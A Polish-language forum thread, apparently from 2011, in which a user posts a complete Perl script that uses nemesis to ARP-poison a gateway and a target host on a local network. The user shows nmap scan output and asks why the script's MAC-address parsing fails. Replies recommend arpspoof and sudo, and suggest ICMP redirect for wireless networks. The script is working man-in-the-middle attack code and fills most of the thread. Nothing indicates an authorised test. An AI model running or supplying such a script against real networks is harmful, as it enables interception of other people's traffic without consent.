'ARP Poisoning' problem

[Kalnor]

Mam problem z atakiem APR Poisoning.

Mam taki programik ktory na podstwaie podanych adresow IP (bramy, cely) oraz interwalu czasowego z interfejsem znajudje adresu MAC obu adresow IP. Potem uzywa programu Nemesis aby 'wstrzyknac' pakiety do sieci.

Program pokazany ponizej:

Kod:

#!/usr/bin/perl

$gateway = shift;
$target = shift;
$time = shift;
$device = shift;

$i = 1;
$SIG{INT} = \&quit;

# Sprawdz poprawnosc argumentow przed startem
if ($gateway!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
{
	die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}

if ($target!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
{
	die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}

if ($time=~/^$/)
{
	$time = 10;
	print("[-] Interwal nieznany, przyjmuje 10 sekund.\n");
}

if ($time!~/^[0-9]+$/)
{
	die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}

if ($device=~/^$/)
{
	$device = "wlan0";
	print("[-] Interfejs nieznany, przyjumje waln0.\n");
}

# Odczytaj adresy MAC bramy i celu
print("[+] Wysylam zadanie echa do $gateway.\n");
system("ping -c 1 -w 1 $gateway 2>&1 > /dev/null");
print("[+] Wysylam zadanie echa do $target.\n");
system("ping -c 1 -w 1 $target 2>&1 > /dev/null");

# Pakiety wyslano, mozemy odczytac adresy MAC
print "[+] Odczytuje adresy MAC z pamieci podrecznej ARP.\n";
$gateway_mac = qx[arp -na $gateway];
$gateway_mac = substr($gateway_mac, index($gateway_mac, ":")-2, 17);

$target_mac = qx[arp -na $target];
$target_mac = substr($target_mac, index($target_mac, ":")-2, 17);

# Sprawdz czy odczytane adresy MAC sa poprawne
if ($gateway_mac!~/^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/)
{
	die("[!] Nie moglem odczytac adresu MAC dla $gateway.");
}

if ($target_mac!~/^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/)
{
	die("[!] Nie moglem odczytac adresu MAC dla $target.");
}

# Odczytaj wlasny adres IP oraz MAC
print "[+] Odczytuje wlasny adres IP oraz MAC, wykorzystujac ifconfig.\n";
@ifconf = split(" ", qx[ifconfig $device]);
$you = substr(" ", qx[ifconfig $device]);
$you = substr(@ifconf[6],5);
$you_mac = $ifconf[4];

print "[+] Interwal wysylania pakietow to $time sekund.\n\n";

print "-> Ty:	$you [$you_mac]\n";
print "-> Cel:	$target [$target_mac]\n";
print "-> Brama:	$gateway [$gateway_mac]\n\n";

# Wysylamy pakiety ARP
while($i)
{
	print("[+] Wysylam pakiet ARP: Powiedz $target, ze $gateway jest osiagalny pod $you_mac\n");
	system("nemesis arp -r -d $device -S $gateway -D $target -h $you_mac -m $target_mac -H $you-mac -M $target-mac 2>&1 > /dev/null");
	print("[+] Wysylam pakiet ARP: Powiedz $gateway, ze $target jest osiagalny pod $you_mac\n");
	system("nemesis arp -r -d $device -S $target -D $gateway -h $you_mac -m $gateway_mac -H $you_mac -M $gateway_mac 2>&1 > /dev/null");

	sleep $time;
}

# Wcisnieto ctrl+c, przywracamy oryginalne ustawiena
sub quit
{
	$i = 0;
	print("[-] Koniec programu. Przywracanie oryginalnych ustawien ARP.\n");
	system("nemesis arp -r -d $device -S $gateway -D $target -h $gateway_mac -m $target_mac -H $gateway_mac -M $target_mac 2>&1 > /dev/null");
	system("nemesis arp -r -d $device -S $target -D $gateway -h $target_mac -m $gateway_mac -H target_mac -M $gateway_mac 2>&1 > /dev/null");
}

Program jest napisany w Perl.

Uzywam komendy

Kod:

nmap -sP 192.168.1.*

Ona pokazuje mi ze znalezione zostaly trzy uzadzenia w sieci:

Kod:

Starting Nmap 5.21 ( http://nmap.org ) at 2011-12-10 11:22 GMT
Nmap scan report for 192.168.1.1
Host is up (0.00049s latency).
MAC Address: 00:24:D2:27:37:84 (Askey Computer)
Nmap scan report for 192.168.1.3
Host is up (0.0029s latency).
MAC Address: C4:17:FE:55:CE:9C (Unknown)
Nmap scan report for 192.168.1.4
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.60 seconds

Wiec tak. Ja jestem pod adresem 192.168.1.4. Brama to 192.168.1.1. A cel to 192.168.1.3.

Teraz wprowadzam te dane to programu.

Kod:

./arp.pl 192.168.1.1 192.168.1.3

Potem dostaje taki output:

Kod:

[-] Interwal nieznany, przyjmuje 10 sekund.
[-] Interfejs nieznany, przyjumje waln0.
[+] Wysylam zadanie echa do 192.168.1.1.
[+] Wysylam zadanie echa do 192.168.1.3.
[+] Odczytuje adresy MAC z pamieci podrecznej ARP.
[!] Nie moglem odczytac adresu MAC dla 192.168.1.1. at ./arp.pl line 56.

Wiec program uwaza ze adres MAC jest niepoprawny dla bramy a jesli usune veryfikacje adresu MAC dla bramy to ten sam problem dostaje dla celu. Moze mi ktos powiedziec co robie nie tak?

Z gory dzieki. :]

[matmat0123456789]

skorzystaj z narzedzia arpspoof bedzie znacznie prosciej wiecej na ten temat znajdziesz w googlach, ale latwo sie go uzywa
w skrocie musisz przekonac brame ze to ty jestes maszyna docelowa a ofiare ze to ty jestes bramą ale nie pamietam w jakiej kolejnosci wpisuje sie argumenty
program odpalasz 2 razy i tak jak napisalem wczesniej musisz w taki sposob odpalic te argumenty
powodzenia

[Kalnor]

Dzieki za odpowiedz. Zaraz sobie o tym poczytam. :]

To samo tutaj probowalem zrobic ale niestety nie wypalilo.

[Kalnor]

Sprobowalem uzyc arpsoof'a i nie zabardzo mi wyszlo. Terminal odmawia mi dostepu do pliku arpspoof.8. Probowalem

Kod:

chmod -X ./arpspoof.8

ale nie pomoglo. Moze mi ktos pomoc naprawidz program ktory ja mam?

Z gory dzieki.

[TQM]

Dany MAC musi byc aktywny, tzn ta masznyna ktora chcesz spoofowac musi byc on-line a tutaj ewidentnie Twoj system nie zna jej adresu MAC... wystarczy jeden pakiet PING i MAC bedzie znany - jesli maszyna jest on-line.

Sprobowalem uzyc arpsoof'a i nie zabardzo mi wyszlo. Terminal odmawia mi dostepu do pliku arpspoof.8. Probowalem

Kod:

chmod -X ./arpspoof.8

ale nie pomoglo. Moze mi ktos pomoc naprawidz program ktory ja mam?

Z gory dzieki.

OMFG... dlaczego wyglada mi to jak strona manuala (man 8 arpspoof) a nie binarka programu? Proponuje nauczyc sie podstaw aby nie popelniac takich bledow a dopiero pozniej zabierac sie za dalsza zabawe - nie znajac podstaw nic nie osiagniesz.

[matmat0123456789]

nie wiem az tak obeznany w budowie programu arpspoof i nie wiem co znajduje sie w pliku arpspoof8,,kiedys uzywalem arpspoof i nie mialem takich problemow
z nim, wiem jednak ze odwołując sie do roznych bibliotek linuxa np socketow i innych sieciowych, niezbedne jest uruchamianie programow na prawach roota, wiec sudo ... jesli podpowiedz tqm nie zadzialala bo z tego co widze nadajesz tylko prawa roota tylko do jednego pliku a nie odpalasz calego programu na prawach roota

[Kalnor]

Najpierw wpisuje komende:

Kod:

sudo -s

aby uzyskac prawa root'a. Robilem tak od samego poczatku ale nic to nie daje.

[matmat0123456789]

zaraz zaraz? jaka to siec? bezprzewodowa? siec bezprzewodowa nie jest odpowiednikiem switcha, dziala podobnie do huba przynajmniej u mnie tak router dziala, wiec jesli 2 hosty sa polaczone lanem bezprzewodowo to nie ma takiej fizycznej mozliwosci zebys mogl spoofowac i to by sie wtedy pokrywalo z postem tqm ze nie ma hosta w tablicach arp.
co innego jesli co najmniej jeden host jest podłączony do routera za pomocą kabla, wtedy jest to switch (albo cos w tym stylu, nie wiem nie jestem administratorem )
W przypadku bezprzewodowym mozesz sprobowac techniki icmp redirect, i jesli icmp nie jest blokowane przez jakis firewall to powinno zadzialac
Jaki rodzaj sieci masz?